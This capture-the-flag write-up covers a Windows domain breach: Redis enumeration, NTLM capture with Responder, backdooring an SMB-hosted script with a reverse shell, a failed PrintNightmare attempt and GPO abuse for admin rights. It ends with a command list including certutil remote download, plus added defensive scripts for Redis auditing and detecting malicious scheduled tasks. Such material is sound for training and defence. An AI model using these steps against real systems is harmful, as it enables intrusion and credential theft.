In this walk-through, we covered enumerating a Redis NoSQL database, attempting to exploit the Print Spooler service vulnerability CVE-2021-34527 (PrintNightmare), and abusing Group Policy permissions in Active Directory.
VulnNet Entertainment had a bad time with their previous network which suffered multiple breaches. Now they moved their entire infrastructure and hired you again as a core penetration tester. Your objective is to get full access to the system and compromise the domain.
- Difficulty: Medium
- Operating System: Windows
Another Windows machine. Do your best and breach it, good luck!
Initial Scans and User Flag
I started with an Nmap scan, which showed a Redis database running. After installing the redis-cli tool, I connected to the database and used the info command to confirm it was running on Windows.
To get the user flag, I used the eval command in Redis to try and display a sensitive file. This actually caused an error that conveniently spat out the user flag for me.
Getting a Foothold
Next, I used the config get * command to find exposed directories and the username "enterprise security". To get this user's NTLM hash, I set up a Responder listener on my machine and used a Redis command to make the target machine connect back to me.
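The enumeration above worked because the Redis instance answered INFO, CONFIG GET * and EVAL without a password and was reachable from the network. The following is an added example, not code from the original write-up, that audits a CONFIG GET * reply for exactly those weaknesses. The reply is a constructed sample shaped like the flat key/value list redis-cli returns; in a live check you would replace it with the output of redis-py's config_get(), which already returns a dict, so parse_config_reply would be skipped.

```python
"""Audit a Redis `CONFIG GET *` reply for settings that let an unauthenticated
client read files, write to disk or reach out to other hosts.
Added example for this write-up; not the original author's code."""

# Constructed sample, shaped like the alternating [key, value, ...] list that
# CONFIG GET * returns. Values mimic an exposed Windows Redis instance; they
# are not taken from the machine in the write-up.
SAMPLE_CONFIG_REPLY = [
    "dbfilename", "dump.rdb",
    "requirepass", "",
    "protected-mode", "no",
    "bind", "0.0.0.0",
    "dir", "C:\\Users\\example-user\\Downloads",
    "port", "6379",
]


def parse_config_reply(flat_reply):
    """Turn the alternating [key, value, key, value, ...] list into a dict."""
    keys = flat_reply[0::2]
    values = flat_reply[1::2]
    return dict(zip(keys, values))


def audit_redis_config(cfg):
    """Return a list of findings; each string starts with the offending
    setting name. An empty list means none of the checks fired."""
    findings = []

    # 1. No password: any client that reaches the port gets INFO, CONFIG,
    #    EVAL and the rest, which is what allowed the enumeration above.
    if not cfg.get("requirepass"):
        findings.append("requirepass: empty, the instance accepts unauthenticated clients")

    # 2. Protected mode is Redis' own safety net for passwordless instances:
    #    when enabled it refuses non-loopback connections if no password is set.
    if cfg.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled, passwordless access is allowed from other hosts")

    # 3. Binding to every interface exposes the service to the whole network.
    bind_addrs = cfg.get("bind", "").split()
    if not bind_addrs or any(a in ("0.0.0.0", "*", "::") for a in bind_addrs):
        findings.append("bind: listening on all interfaces instead of loopback or a management address")

    # 4. Redis 7 can forbid CONFIG SET on dir/dbfilename, the knobs that let a
    #    client choose where the database file is written. Older builds,
    #    including most Windows ports, lack this key; absence means the
    #    default "no" (protected configs cannot be changed at runtime).
    if cfg.get("enable-protected-configs", "no").lower() == "yes":
        findings.append("enable-protected-configs: dir and dbfilename can be changed at runtime")

    return findings


def hardened_copy(cfg, password):
    """Return a copy of cfg with the values a sane deployment would use, so
    the audit can be shown passing as well as failing."""
    fixed = dict(cfg)
    fixed["requirepass"] = password
    fixed["protected-mode"] = "yes"
    fixed["bind"] = "127.0.0.1"
    fixed["enable-protected-configs"] = "no"
    return fixed


if __name__ == "__main__":
    cfg = parse_config_reply(SAMPLE_CONFIG_REPLY)
    for finding in audit_redis_config(cfg):
        print("FINDING:", finding)
    # "<placeholder-password>" stands in for a real secret from a vault
    remaining = audit_redis_config(hardened_copy(cfg, "<placeholder-password>"))
    print("after hardening:", remaining or "clean")
```

The three findings the sample produces (no password, protected mode off, bound to all interfaces) are the combination that turns a local cache into an entry point; fixing any one of the first two would already have stopped the unauthenticated enumeration in this room.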
With the captured hash, I used Hashcat to crack it and get the password. I then used the SMB client to connect to the server and found a PowerShell script. I downloaded the script, added a reverse shell payload to it, and re-uploaded it. After setting up a Netcat listener, the executed script gave me a shell as the “enterprise security” user.
Privilege Escalation Attempts
My first thought for privilege escalation was to try the PrintNightmare vulnerability, since the Nmap scan showed the Windows Print Spooler service was running. I used rpcmap.py to check for the vulnerability and even created a malicious DLL with msfvenom. However, when I tried to run the exploit, it failed.
So, I switched gears and decided to use BloodHound. I transferred the SharpHound.exe collector to the target machine, ran it to collect Active Directory data, and then analyzed the data back on my machine.
BloodHound showed me that the "enterprise security" user had "GenericWrite" access to a Group Policy Object (GPO). I used SharpGPOAbuse.exe to exploit this by adding a scheduled task to the GPO that would add the "enterprise security" user to the local "Administrators" group. I forced the policy update with gpupdate /force, and just like that, I had admin rights!
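The scheduled task that SharpGPOAbuse adds to a GPO lands in SYSVOL as a Group Policy Preferences file (Machine\Preferences\ScheduledTasks\ScheduledTasks.xml under the policy's folder), so a defender can catch this step by scanning those files for immediate tasks whose command line changes local group membership. The following is an added example, not part of the original write-up or of the SharpGPOAbuse project: a small scanner over a constructed ScheduledTasks.xml modelled on the GPP layout. The task names, user name and zeroed uid values in the sample are made up.

```python
"""Scan a Group Policy Preferences ScheduledTasks.xml for tasks of the kind
used to add a user to the local Administrators group.
Added example for this write-up; not the original author's code."""

import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the GPP ScheduledTasks.xml layout. The first
# task is shaped like the one described in the write-up (an immediate task
# running a net localgroup ... /add), the second is a benign maintenance task.
SAMPLE_SCHEDULED_TASKS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <ImmediateTaskV2 name="Update" changed="2024-01-01 00:00:00"
                   uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators EXAMPLE\lowpriv-user /add</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Disk Cleanup" changed="2023-06-01 00:00:00"
          uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" name="Disk Cleanup" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Windows\System32\cleanmgr.exe</Command>
            <Arguments>/sagerun:1</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# Command-line shapes that change who is a local administrator or create
# accounts. Each label is reported once per task.
SUSPICIOUS_PATTERNS = [
    ("local-admin-change", re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
    ("local-admin-change", re.compile(r"\bAdd-LocalGroupMember\b", re.I)),
    ("user-creation", re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("encoded-powershell", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
]

TASK_TAGS = ("ImmediateTaskV2", "TaskV2", "ImmediateTask", "Task")


def scan_scheduled_tasks_xml(xml_text):
    """Return a list of finding dicts, one per task whose command line matches
    a suspicious pattern. Immediate tasks (run once at the next policy
    refresh, which is what gpupdate /force triggers) raise the severity."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []
    for task in root:
        if task.tag not in TASK_TAGS:
            continue
        props = task.find("Properties")
        command = task.findtext("Properties/Task/Actions/Exec/Command", default="")
        args = task.findtext("Properties/Task/Actions/Exec/Arguments", default="")
        cmdline = f"{command} {args}".strip()

        reasons = []
        for label, pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(cmdline) and label not in reasons:
                reasons.append(label)
        if not reasons:
            continue  # content looks ordinary; an immediate task alone is not flagged

        immediate = task.tag.startswith("Immediate")
        if immediate:
            reasons.append("immediate-task")
        findings.append({
            "name": task.get("name", ""),
            "type": task.tag,
            "run_as": props.get("runAs", "") if props is not None else "",
            "command_line": cmdline,
            "reasons": reasons,
            "severity": "high" if immediate else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in scan_scheduled_tasks_xml(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"[{f['severity']}] {f['type']} '{f['name']}' as {f['run_as']}: "
              f"{f['command_line']} ({', '.join(f['reasons'])})")
```

Run it over every ScheduledTasks.xml under the domain's SYSVOL share on a schedule and diff the results; a new immediate task that touches the Administrators group, written by a non-admin principal that holds GenericWrite on the GPO, is the signal that the step described above is under way. The same GenericWrite finding from BloodHound is what the GPO's permissions should be audited for in the first place.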
Getting the System Flag 🚩
With my new admin privileges, I used the SMB client to access the C$ share on the target machine. From there, it was just a matter of navigating to the administrator’s desktop and grabbing the system flag.
Technical Commands Used
Here are the technical commands I used in the terminal during the demonstration:
sudo apt-get install redis-tools (the package that provides redis-cli)
redis-cli -h [IP]
info
eval
config get *
sudo responder -I [interface]
hashcat
smbclient -L [IP] -U [user]
Invoke-Expression
python3 rpcmap.py
msfvenom
use multi/handler
sudo python3 -m http.server 80
certutil.exe -urlcache -f http://[IP]/[file] [file]
SharpHound.exe
copy [source] \\[IP]\[share]
SharpGPOAbuse.exe
gpupdate /force
get system.txt
What is the system flag? (Desktop\system.txt)